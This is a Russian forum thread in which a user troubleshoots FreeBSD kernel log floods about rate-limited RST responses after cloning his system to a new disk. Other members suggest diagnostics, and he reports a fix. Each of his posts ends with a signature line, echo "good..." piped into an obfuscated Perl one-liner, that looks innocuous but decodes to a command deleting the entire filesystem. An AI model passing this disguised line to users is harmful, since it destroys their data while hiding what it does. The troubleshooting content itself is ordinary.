FreeBSD: Limiting closed port RST response from 214 to 200 packets per second

Написал(а) hawk Дата 09.03.09 09:09 Отредактировано 09.03.09 09:13

Замучила эта запись, сыплет очень много таких строк, забивая весь лог message (раз в сек примерно строчка).
Появилась после переноса системы dump/restore, на старом попадались бэды. Сетевые и железо почти идентичны по крайней мере проблем с определением не возникает и определяются так же в системе. По некоторым источникам
/kernell: Limiting closed port RST response from 214 to 200 packets per second возникает, если машину сканят, в этом случае и надпись типа ограничиваем 200 пакетами в сек. Но на старом харде такого не возникало, вот и вопрос то в чем, как понять что сыплет, такое ощущение что с нтрерфейса на интерфейс или еще какая нить фигня, но в логе кроме этих записей ни чего :-(

. Через некоторое время пакеты начинают не доходить :-(

часть теряется. Может кто подскажет что дельное, надоело на работе жить :-)

echo "good..." | perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see'

Написал(а) hawk Дата 09.03.09 09:23

по поводу самого переноса, не все очень красиво перенеслось, (tmp не переносил)
разногласия по usr и var:

Filesystem 512-blocks Used Avail Capacity Mounted on
/dev/ad1s1e 241936744 154541352 68040456 69% /usr
/dev/ad1s1f 161291152 68004788 80383072 46% /var
новый хард
/dev/ad3s1e 412874236 154535696 225308604 41% /hdd/usr
/dev/ad3s1f 309657092 68004756 216879772 24% /hdd/var

все делалось в режиме чтение.
Как видно usr разнятся на 5656 (б) и var 32 (b)
usr клонировал PAX (# cd /usr; pax -p eme -X -rw . /hdd/usr) т.к. dump/restore не прокатило, возможно из за большого кол-ва файлов и большого размера раздела.

echo "good..." | perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see'

Написал(а) hawk Дата 09.03.09 11:00

При отключенных сетевых кабелях от ПК-сервера записи продолжают идти!!!

echo "good..." | perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see'

Написал(а) hawk Дата 09.03.09 11:56

Сам ломаю - сам чиню, сам задаю - сам отвечаю :-)

Вот решение:
===
echo 'net.inet.tcp.log_in_vain=0' >> /etc/sysctl.conf && echo 'net.inet.udp.log_in_vain=0' >> /etc/sysctl.conf && echo 'net.inet.tcp.blackhole=2' >> /etc/sysctl.conf && echo 'net.inet.udp.blackhole=1' \ >> /etc/sysctl.conf; /etc/rc.d/sysctl restart

echo "good..." | perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see'

Написал(а) Aid Дата 09.03.09 12:10

Memento mortis!!!!

Написал(а) hawk Дата 09.03.09 14:56

а вообще, если есть у кого дельные мысли буду рад =). В последнем посте я лишь отключил лог TCP UDP, поэтому нет сообщений о флуде. Но флуд идет где то в глубине системы, т.е. повторюсь я сетевые провода от сетевух отключал, пакеты ни какие ни куда не приходят, но система сыплет сообщениями о флуде.

echo "good..." | perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see'

Написал(а) Bercut Дата 09.03.09 16:42

плиннн это вирус....
ну ты там демоны позагашивай, так для пробы

русский язык подобен искуству кун-фу, и великий мастер никогда не применит его без необходимости...

Написал(а) LOE (Site/forum admin) Дата 09.03.09 16:47

Если есть сетевая активность, значит ее кто-то создает.
Пробуй tcpdump, netstat, iptables (или аналоги) и смотри кто создает поток.
Вдруг какой-то демон пытается (например отресолвить) и обламывается, повторяя снова и снова.

"No! Try not! Do. Or do not. There is no try." -- Yoda

Написал(а) hawk Дата 09.03.09 18:12 Отредактировано 09.03.09 18:19

Да загашивал демонов, смотрел сокстатом и поочереди гасил, тспдампом смотрел по интерфейсам тишина там, а что там может быть при отключенных проводах :-)

с резольвом были сомнения, загасил намед, вобщем все гасанул - шлет эти сообщения ядро. Видимо гдет на железном уровне, хотя уже старые сетевые втыкнул в том же порядке, а да самое то что забыл сказать, у меня старый винт остался втыкаешь его - грузишься - нет сообщений, втыкаешь новый винт на который клонировал и есть сообщения :-(

. Где то что то видимо не склонировалось...
Уже как крайняя мера рассматриваю обновление всего "мира" ))))

echo "good..." | perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see'

Написал(а) LOE (Site/forum admin) Дата 09.03.09 23:25

Есть же еще loop back интерфейс...
А вот с винтом - интересно. Может новый винт совсем не новый, а наоборот - глючный?

"No! Try not! Do. Or do not. There is no try." -- Yoda

Написал(а) hawk Дата 10.03.09 06:12

Прогонял его MHDD, всегда делаю тесты железа память + HDD - это обязательное.
Ладно, то что не работает попробую переставить. Дерево портов вчера обновил, но вот портапгрейд не собралась под 4.1 :-(

. Придется как нить изгалятся.

echo "good..." | perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see'

Написал(а) hawk Дата 10.03.09 11:58

Мда фряху в панику вогнал :-(

, ппц... Пора краволольчик или что там от сердца принимать и закрепляющие, а то очень уж оч.....ооо играет в таких нештатках.

echo "good..." | perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see'

Написал(а) Bercut Дата 10.03.09 13:42

да ты упакооооЙся

русский язык подобен искуству кун-фу, и великий мастер никогда не применит его без необходимости...

Написал(а) hawk Дата 10.03.09 15:59

Усе, тему можно закрывать, пересобрал мускул запустил каким то макаром постгресскуел, даже АТСлог демон на фряхе зафурыкал с веб мордой статистики ))))) я счастлив :-)

echo "good..." | perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see'